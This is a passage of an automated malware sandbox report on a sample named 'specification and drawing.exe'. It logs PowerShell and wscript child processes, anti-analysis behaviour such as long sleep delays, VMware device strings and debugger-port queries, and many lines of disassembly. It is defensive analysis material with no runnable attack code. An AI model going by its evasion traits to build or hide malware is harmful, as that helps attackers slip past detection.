                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: specification and drawing.exe PID: 6316, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\wscript.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: 1380000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: 2DC0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: 9040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: A040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: A250000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: B250000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_0110096E rdtsc 4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4589
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 670
                      Source: C:\Windows\SysWOW64\wscript.exe Window / User API: threadDelayed 1820
                      Source: C:\Windows\SysWOW64\wscript.exe Window / User API: threadDelayed 8153
                      Source: C:\Users\user\Desktop\specification and drawing.exe API coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\wscript.exe API coverage: 2.7 %
                      Source: C:\Users\user\Desktop\specification and drawing.exe TID: 5260 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5128 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032 Thread sleep count: 1820 > 30
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032 Thread sleep time: -3640000s >= -30000s
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032 Thread sleep count: 8153 > 30
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032 Thread sleep time: -16306000s >= -30000s
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820 Thread sleep time: -65000s >= -30000s
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820 Thread sleep count: 32 > 30
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820 Thread sleep time: -48000s >= -30000s
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820 Thread sleep count: 32 > 30
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820 Thread sleep time: -32000s >= -30000s
                      Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_0076C7A0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0076C7A0
                      Source: specification and drawing.exe, 00000000.00000002.2165460201.0000000001153000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\specification and drawing.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_0110096E rdtsc 4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_00417BA3 LdrLoadDll, 4_2_00417BA3
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01180115 mov eax, dword ptr fs:[00000030h] 4_2_01180115
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116437C mov eax, dword ptr fs:[00000030h]4_2_0116437C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E438F mov eax, dword ptr fs:[00000030h]4_2_010E438F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E438F mov eax, dword ptr fs:[00000030h]4_2_010E438F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011643D4 mov eax, dword ptr fs:[00000030h]4_2_011643D4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011643D4 mov eax, dword ptr fs:[00000030h]4_2_011643D4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011463C0 mov eax, dword ptr fs:[00000030h]4_2_011463C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117C3CD mov eax, dword ptr fs:[00000030h]4_2_0117C3CD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F63FF mov eax, dword ptr fs:[00000030h]4_2_010F63FF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B823B mov eax, dword ptr fs:[00000030h]4_2_010B823B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6259 mov eax, dword ptr fs:[00000030h]4_2_010C6259
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148243 mov eax, dword ptr fs:[00000030h]4_2_01148243
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148243 mov ecx, dword ptr fs:[00000030h]4_2_01148243
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA250 mov eax, dword ptr fs:[00000030h]4_2_010BA250
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B826B mov eax, dword ptr fs:[00000030h]4_2_010B826B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE284 mov eax, dword ptr fs:[00000030h]4_2_010FE284
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE284 mov eax, dword ptr fs:[00000030h]4_2_010FE284
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov ecx, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156500 mov eax, dword ptr fs:[00000030h]4_2_01156500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8550 mov eax, dword ptr fs:[00000030h]4_2_010C8550
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8550 mov eax, dword ptr fs:[00000030h]4_2_010C8550
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4588 mov eax, dword ptr fs:[00000030h]4_2_010F4588
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2582 mov eax, dword ptr fs:[00000030h]4_2_010C2582
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2582 mov ecx, dword ptr fs:[00000030h]4_2_010C2582
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE59C mov eax, dword ptr fs:[00000030h]4_2_010FE59C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E45B1 mov eax, dword ptr fs:[00000030h]4_2_010E45B1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E45B1 mov eax, dword ptr fs:[00000030h]4_2_010E45B1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE5CF mov eax, dword ptr fs:[00000030h]4_2_010FE5CF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE5CF mov eax, dword ptr fs:[00000030h]4_2_010FE5CF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C65D0 mov eax, dword ptr fs:[00000030h]4_2_010C65D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA5D0 mov eax, dword ptr fs:[00000030h]4_2_010FA5D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA5D0 mov eax, dword ptr fs:[00000030h]4_2_010FA5D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC5ED mov eax, dword ptr fs:[00000030h]4_2_010FC5ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC5ED mov eax, dword ptr fs:[00000030h]4_2_010FC5ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
